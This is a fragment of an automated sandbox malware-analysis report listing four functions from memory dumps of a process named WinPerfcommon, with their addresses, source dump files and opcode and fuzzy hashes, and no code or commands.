                                                                  Function 00007FF848F43A97 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8ac222ae8197b07f856349e2e84787e76a7109e2cd56f1b238114259fc5d9473
                                                                  • Instruction ID: 32fc87aab2a9b5bdaa310bdd681c8745266eedfc0097fd27efe0bbfe0f2e1ed4
                                                                  • Opcode Fuzzy Hash: 8ac222ae8197b07f856349e2e84787e76a7109e2cd56f1b238114259fc5d9473
                                                                  • Instruction Fuzzy Hash: 34C08C20E0BC2A16E205A314442027F0803CF40B84F800070E00E823CBCE0C5A01028A
                                                                  Function 00007FF848F406C8 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 189e652472875f4bc8a3a6833c55602404f401b1c9c144337fdce74206230e9e
                                                                  • Instruction ID: 8fb5020ea92d69864f8b2c2ded33f16b71afe01002dca88c63b18ad984a22895
                                                                  • Opcode Fuzzy Hash: 189e652472875f4bc8a3a6833c55602404f401b1c9c144337fdce74206230e9e
                                                                  • Instruction Fuzzy Hash: 5DB01210C6E40F04F45433FB0C4306470405B94584FC00071DC0C602C3994D10A4024A
                                                                  Function 00007FF848F430A2 Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6a6a2d20342c38b38a6d226f4b291c9384c5e06bf88e15d7bce620f107365e7e
                                                                  • Instruction ID: 85ab719d71801f15143c9d7ef5da78231384e57160cbfef7b21fd56e823fab99
                                                                  • Opcode Fuzzy Hash: 6a6a2d20342c38b38a6d226f4b291c9384c5e06bf88e15d7bce620f107365e7e
                                                                  • Instruction Fuzzy Hash: 14B0922084D0258AE285B210C05063C21480B61680F154432980D731C2CA0828815646
                                                                  Function 00007FF849352F4A Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 68f34c3b3e72bf3d437eb4902a45668d135c994d5871d7ce3bcb564642de3738
                                                                  • Instruction ID: 6506c0593f52548dad95ce1eda6c6bad5125bf8991f54d3cf2d9ea1c6315a5e8
                                                                  • Opcode Fuzzy Hash: 68f34c3b3e72bf3d437eb4902a45668d135c994d5871d7ce3bcb564642de3738
                                                                  • Instruction Fuzzy Hash: 8BA00220E0C95A9DF071B624408357E85813F4AB94F205431D01E851DACE9DA90216CB